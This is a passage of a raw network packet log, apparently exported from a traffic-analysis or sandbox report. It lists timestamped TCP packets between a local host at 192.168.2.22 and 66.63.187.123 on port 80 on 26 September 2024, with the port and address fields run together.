                                              Sep 26, 2024 07:47:21.001821041 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001849890 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001851082 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001876116 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001887083 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001890898 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001913071 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001916885 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001924038 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001929045 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001950026 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001956940 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001961946 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001965046 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001986980 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001986980 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.002003908 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.002007008 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.002043009 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.002069950 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.002069950 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.002856970 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.002868891 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.002890110 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.002924919 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.002924919 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.002928972 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.002947092 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.002959013 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.002964020 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.002964973 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.002999067 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.002999067 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003012896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003035069 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003037930 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003046036 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003046036 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003070116 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003078938 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003106117 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003772974 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003794909 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003813028 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003824949 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003834009 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003834009 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003853083 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003858089 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003865004 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003865957 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003887892 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003894091 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003900051 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003901958 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003918886 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003926992 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003935099 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003938913 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003961086 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003969908 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.003973961 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.003978968 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.004003048 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.004014015 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.004040956 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.004611969 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.004664898 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.004703045 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.004714012 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.004735947 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.004744053 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.004749060 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.004765987 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.004776001 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.004791021 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.006159067 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.006170988 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.006191969 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.006227016 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.006339073 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007021904 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007033110 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007054090 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007064104 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007083893 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007086039 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007102966 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007108927 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007108927 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007116079 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007123947 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007136106 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007152081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007158041 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007162094 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007168055 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007174969 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007189989 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007200956 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007208109 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007211924 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007222891 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007246971 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007802010 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007812977 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007834911 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007859945 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007863998 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007874966 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007877111 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007904053 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007909060 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007916927 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007939100 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007941961 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007951021 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007961988 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007972956 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.007977962 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.007997990 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.008008957 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.008028030 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147578955 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147617102 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147643089 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147654057 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147675991 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147686958 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147706032 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147708893 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147706032 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147722960 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147747993 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147747993 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147753954 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147757053 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147767067 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147788048 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147797108 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147802114 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147818089 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147825956 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147838116 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147855043 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147855043 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147867918 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147881985 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147881985 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147905111 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147918940 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147924900 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147944927 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147954941 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147969007 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.147969007 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.147984028 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148013115 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148017883 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148025036 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148046017 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148052931 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148056984 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148060083 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148083925 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148083925 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148098946 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148106098 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148106098 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148121119 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148132086 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148138046 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148154974 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148169994 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148178101 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148190022 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148204088 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148211002 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148215055 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148221970 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148225069 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148247004 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148255110 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148267031 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148272038 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148286104 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148300886 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148302078 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148309946 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148329973 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148334980 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148335934 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148355961 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148372889 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148380041 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148394108 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148399115 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148415089 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148422956 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148427010 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148428917 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148433924 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148447037 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148454905 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148466110 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148473978 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148482084 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148492098 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148494959 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148523092 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148529053 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148535967 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148541927 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148550987 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148556948 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148576021 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148581028 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148581028 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148597002 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.148613930 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148632050 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.148664951 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.153498888 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153513908 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153575897 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.153774023 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153786898 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153810024 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153834105 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153845072 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153860092 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.153862953 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153883934 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153898001 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.153913975 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153923988 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153928995 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.153947115 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153956890 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.153964043 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.153987885 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154012918 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154019117 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154026031 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154042959 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154056072 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154057026 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154079914 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154086113 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154092073 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154109001 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154119015 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154149055 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154150963 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154172897 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154179096 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154186010 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154205084 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154222012 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154236078 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154256105 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154267073 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154268026 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154288054 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154294968 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154294968 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154294968 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154305935 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154304028 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154314041 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154328108 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154340982 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154356003 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154360056 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154371977 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154375076 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154406071 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154409885 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154453039 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154465914 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154478073 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154501915 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154511929 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.154521942 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154541016 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154556036 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154623032 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.154669046 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.235905886 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.236027002 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292579889 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292629004 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292639017 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292654037 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292675972 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292689085 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292685986 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292736053 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292736053 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292736053 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292736053 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292773008 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292785883 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292807102 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292819023 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292830944 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292839050 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292927027 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292953968 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292964935 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.292968035 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.292996883 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293000937 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293051958 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293067932 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293093920 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293095112 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293095112 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293289900 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293303013 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293328047 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293351889 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293365002 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293370008 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293380976 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293396950 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293411970 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293421984 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293428898 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293436050 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293447018 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293461084 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293473005 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293483019 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293490887 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293494940 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293499947 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293515921 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293519974 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293529987 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293544054 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293556929 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293559074 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293580055 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293582916 CEST4916180192.168.2.2266.63.187.123
